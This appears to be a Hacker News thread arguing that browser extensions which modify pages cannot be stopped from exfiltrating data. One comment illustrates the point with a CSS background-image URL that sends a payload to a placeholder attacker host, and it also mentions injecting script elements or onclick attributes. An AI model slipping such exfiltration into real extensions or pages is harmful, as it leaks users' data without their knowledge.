>But you have all the code and you know which functions/methods/etc that can do requests so it should be trivial

but you can't. See the last part of my comment: "they can inject arbitrary scripts into pages to make requests for them".

>either way, if it is not a solvable problem, there is a major problem in the design.

Not really. It's like complaining that debuggers can impersonate programs they attach themselves to.

> they can inject arbitrary scripts into pages to make requests for them

disallow that behavior?

You could also just pull that code but it might change based on request origin...

Lots of the best extensions are basically "change this webpage when it loads to make it work better." You can't "disallow this behavior" without crippling them.

>It could do all the processing locally, easily...

That's irrelevant. If you can make changes to the page, you can exfiltrate data. The security model for addons isn't designed with restricting an addon's network activity in mind, see my other post: https://news.ycombinator.com/item?id=25623281

Depends on what your addons does. Most addons modify the page in some way. It's also not limited to injecting javascript. You can also exfiltrate data by injecting css (eg. doing something like background-image: url("http://evil.example/?payload=...")) or do javascript injection in alternate ways (eg. adding a <script> element, or adding an onclick attribute).

That's one of the most fundamental functions a browser extension could have